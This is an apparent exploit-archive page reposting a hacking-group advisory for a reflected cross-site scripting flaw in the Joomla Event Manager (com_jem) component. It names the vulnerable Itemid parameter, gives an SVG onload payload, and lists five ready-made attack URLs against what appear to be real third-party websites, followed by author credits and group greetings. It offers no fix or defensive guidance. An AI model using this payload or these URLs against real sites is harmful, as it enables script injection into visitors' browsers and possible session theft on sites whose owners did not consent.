Home / exploitsPDF  

Joomla Event Manager com_jem - Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla Event Manager (com_jem) - Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Joomla Event Manager (com_jem) - Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.joomlaeventmanager.net/download # Category: [ Webapps ] # Tested on: [ Win ] # Version: 2.x # Date: 2016/05/11 ###################### # # PoC: # itemid=[XSS] # Payload = ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team # Demo : # https://www.msuhilleXl.org/index.php?option=com_jem&view=eventslist&Itemid=293%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&limitstart=10 # http://fineartbazar.iXr/portal/index.php?option=com_jem&view=venue&id=22:2015-01-05-09-15-50&Itemid=465%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # http://www.prestoXdigitators.com/index.php?view=eventslist&task=archive&option=com_jem&Itemid=562%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # http://www.degrXootdiervoeders.nl/index.php?option=com_jem&view=eventslist&Itemid=145%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # http://www.kuhXlo-realschule.de/index.php?option=com_jem&view=eventslist&task=archive&Itemid=72%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # ###################### # Discovered by : # Mojtaba MobhaM (<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="d7bcb6adb2babebab8bda3b6b5b697bbbea1b2f9b4b8ba">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>) # T3NZOG4N (<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="1c682f72662c7b28725c657d747373327f7371">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>) # Greetz : Milad Hacking & FireKernel And All Persian Hack Team Members # Homepage : persian-team.ir ###################### </BODY></HTML>

 

TOP